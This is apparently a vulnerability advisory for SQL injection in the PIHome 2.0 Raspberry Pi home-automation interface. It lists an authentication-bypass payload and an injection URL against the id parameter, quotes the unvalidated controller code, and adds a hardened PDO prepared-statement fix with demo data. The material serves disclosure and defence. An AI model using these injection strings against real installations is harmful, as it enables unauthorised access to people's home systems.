RaspberryPi PIHome 2.0 SQL injection

Vendor : http://pihome.harkemedia.de/
Web based application demo : https://www.youtube.com/watch?v=dADgi6LqIMQ
Github: https://github.com/cerosx/RPI.PIHome2.0-GUI-Frontend

1) Auth bypass PoC with OR statement: ' or '1'='1 --
2) Second PoC: recursive fuzzing in the AJAX method

http://localhost/index.php?c=home&a=set&id=1%27+order+by+1111--_on

SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your SQL syntax; 

Snippet from source code:

public function updateaktivAction()
{
    // $_GET['id'] and $_GET['set'] are handed to the model without validation
    if ($_GET['id'] != "") {
        require_once 'models/homeModel.php';
        $model = new homeModel();
        echo $model->updateDeviceAktiv($_GET['id'], $_GET['set']);
    }
}
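
A hardened form of the action above, as an added example (not PIHome's own code): the request values are validated as integers and then bound through a PDO prepared statement. The HomeModel body, the devices table and its id/aktiv columns are assumptions, since the page does not show updateDeviceAktiv(); the demo uses in-memory SQLite with constructed rows and needs PHP 8 with pdo_sqlite.

```php
<?php
declare(strict_types=1);

// Hypothetical stand-in for models/homeModel.php. Table and column names
// (devices, id, aktiv) are assumptions; the real schema is not on the page.
final class HomeModel
{
    public function __construct(private PDO $db) {}

    public function updateDeviceAktiv(int $id, int $set): int
    {
        // Placeholders keep request values out of the SQL text entirely.
        $stmt = $this->db->prepare('UPDATE devices SET aktiv = :set WHERE id = :id');
        $stmt->bindValue(':set', $set, PDO::PARAM_INT);
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->rowCount();
    }
}

// Controller-side check: accept only a positive integer id and set in {0, 1}.
function updateAktiv(HomeModel $model, array $query): string
{
    $id  = filter_var($query['id'] ?? null, FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 1]]);
    $set = filter_var($query['set'] ?? null, FILTER_VALIDATE_INT,
                      ['options' => ['min_range' => 0, 'max_range' => 1]]);
    if ($id === false || $set === false) {
        return 'rejected'; // in the application: answer with HTTP 400, no SQL error text
    }
    return 'updated rows: ' . $model->updateDeviceAktiv($id, $set);
}

// Constructed demo data in an in-memory SQLite database.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE devices (id INTEGER PRIMARY KEY, aktiv INTEGER NOT NULL)');
$db->exec('INSERT INTO devices (id, aktiv) VALUES (1, 0), (2, 0)');
$model = new HomeModel($db);

// A valid request, the id value from the PoC URL above, and a missing id.
echo updateAktiv($model, ['id' => '1', 'set' => '1']), PHP_EOL;
echo updateAktiv($model, ['id' => "1' order by 1111--_on", 'set' => '1']), PHP_EOL;
echo updateAktiv($model, ['set' => '1']), PHP_EOL;
```

Only the first call reaches the database; the other two are refused before any SQL is built, so no SQLSTATE message is returned to the client.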